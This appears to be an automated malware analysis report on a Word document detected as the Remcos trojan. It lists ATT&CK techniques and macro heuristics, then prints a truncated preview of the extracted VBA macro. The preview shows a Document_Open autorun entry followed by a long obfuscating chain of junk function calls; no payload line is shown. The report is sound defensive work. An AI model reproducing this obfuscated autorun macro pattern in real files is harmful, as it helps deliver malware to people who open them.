Verdict: MALICIOUS
Risk Score: 190
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Win.Trojan.Remcos-6656024-0' strongly suggests the malware family and its malicious intent. The macro likely downloads and executes a second-stage payload, consistent with common trojan behavior.
Heuristics (6)
- ClamAV: Win.Trojan.Remcos-6656024-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Remcos-6656024-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 348786 bytes | ae1bb7c384256023986b425f20493b5ae97471899ca00eb00a55083e14947642 |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.file2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub dOcUmeNT_OpEN(): Call ltknbhsbibalnxj: End Sub
Sub ltknbhsbibalnxj()
Call dahgvoekhyeivmg
End Sub
Private Sub dahgvoekhyeivmg()
Call alchoseygumndob
End Sub
Private Function alchoseygumndob() As Currency
Call kutyxiljlqxybys
End Function
Static Function kutyxiljlqxybys() As String
Call rwdopbuhaojodlc
End Function
Function rwdopbuhaojodlc() As Currency
Call sgodnawukkbmrpn
End Function
Sub sgodnawukkbmrpn()
Call qjtrucauehuqixs
End Sub
Private Function qjtrucauehuqixs() As Single
Call ivyehkxjtdsbmwx
End Function
Private Function ivyehkxjtdsbmwx() As Integer
Call xzwqdvvmsasstzw
End Function
Function xzwqdvvmsasstzw() As Object
Call zbrsqtclxyvpqkq
End Function
Function zbrsqtclxyvpqkq() As Single
Call fhkcbnvqbubtnhj
End Function
Private Sub fhkcbnvqbubtnhj()
Call fvdkrmikaqnewvc
End Sub
Static Function fvdkrmikaqnewvc() As Variant
Call dcqrrpxrknbvjnp
End Function
Sub dcqrrpxrknbvjnp()
Call nhyphetvzkrtmnx
End Sub
Function nhyphetvzkrtmnx() As Single
Call cpfuwqdeoglxpze
End Function
Static Sub cpfuwqdeoglxpze()
Call xsponusfqqaergo
End Sub
Static Sub xsponusfqqaergo()
Call uzcwnxhmannvexb
End Sub
Static Function uzcwnxhmannvexb() As Date
Call fekuendqpkesgxj
End Function
Sub fekuendqpkesgxj()
Call tmrzsynaehyxjkq
End Sub
Private Sub tmrzsynaehyxjkq()
Call vtuuyxegydvhbet
End Sub
Private Sub vtuuyxegydvhbet()
Call usqpmyxzdbuxxdp
End Sub
Static Sub usqpmyxzdbuxxdp()
Call mznigfjhcyyvfsm
End Sub
Function mznigfjhcyyvfsm() As String
Call jkijzjjwbufaoth
End Function
Private Function jkijzjjwbufaoth() As Byte
Call ttzaizqggqqkldy
End Function
Static Function ttzaizqggqqkldy() As Byte
Call avjraszevocbnri
End Function
Static Sub avjraszevocbnri()
Call bfugyrbrekuzbvt
End Sub
Sub bfugyrbrekuzbvt()
Call yizuftfrzhndsdy
End Sub
Private Function yizuftfrzhndsdy() As Variant
Call rtegsbchndlowcd
End Function
Static Function rtegsbchndlowcd() As Double
Call gxcsomajnalfdeb
End Function
Static Function gxcsomajnalfdeb()
Call iaxubkhiryocapw
End Function
Private Function iaxubkhiryocapw() As Variant
Call ofqemeanwvvgxmp
End Function
Static Sub ofqemeanwvvgxmp()
Call oujmcdnivqhrgai
End Sub
Private Sub oujmcdnivqhrgai()
Call mawucgcpfnuitsv
End Sub
Sub mawucgcpfnuitsv()
Call wfertvytukkgwsd
End Sub
Private Function wfertvytukkgwsd() As Variant
Call kolxhhicjgfkzek
End Function
Private Sub kolxhhicjgfkzek()
Call muosnfziddcurzn
End Sub
Private Sub muosnfziddcurzn()
Call eigfmogisdyjqpf
End Sub
Static Sub eigfmogisdyjqpf()
Call xqdygvsrszchyec
End Sub
Function xqdygvsrszchyec() As Object
Call tbyzzzsfrvkmhfx
End Function
Function tbyzzzsfrvkmhfx() As Long
Call dkoqipzqvsvwfpo
End Function
Private Sub dkoqipzqvsvwfpo()
Call klzgaiiolphngdy
End Sub
Static Sub klzgaiiolphngdy()
Call lvkvyhkbulyluhj
End Sub
Static Sub lvkvyhkbulyluhj()
Call jyojfjobojrplpo
End Sub
Static Sub jyojfjobojrplpo()
Call bktwsrlqdfqapot
End Sub
Sub bktwsrlqdfqapot()
Call qosiocktdcqqwqr
End Sub
Static Function qosiocktdcqqwqr() As Date
Call srnkbaqshzsotbm
End Function
Static Function srnkbaqshzsotbm() As Boolean
Call ywfumukxmwzsqyf
End Function
Sub ywfumukxmwzsqyf()
Call zkycctxrlsldzmy
End Sub
Private Sub zkycctxrlsldzmy()
Call wrljcwlyvoyunek
End Sub
Private Function wrljcwlyvoyunek() As Variant
Call gwuhslicklprpet
End Function
Static Sub gwuhslicklprpet()
Call vebmhxrmzijwsqa
End Sub
Sub vebmhxrmzijwsqa()
Call wldimvistfggkld
End Sub
Sub wldimvistfggkld()
Call vkadbxblydfwgjz
End Sub
Private Sub vkadbxblydfwgjz()
Call orxwventxzjuoyw
End Sub
Static Function orxwventxzjuoyw() As Byte
Call kcsxoinhwvrzxar
End Function
Function kcsxoinhwvrzxar()
Call naegifizltziybd
End Function
Sub naegifizltziybd()
... (truncated)
```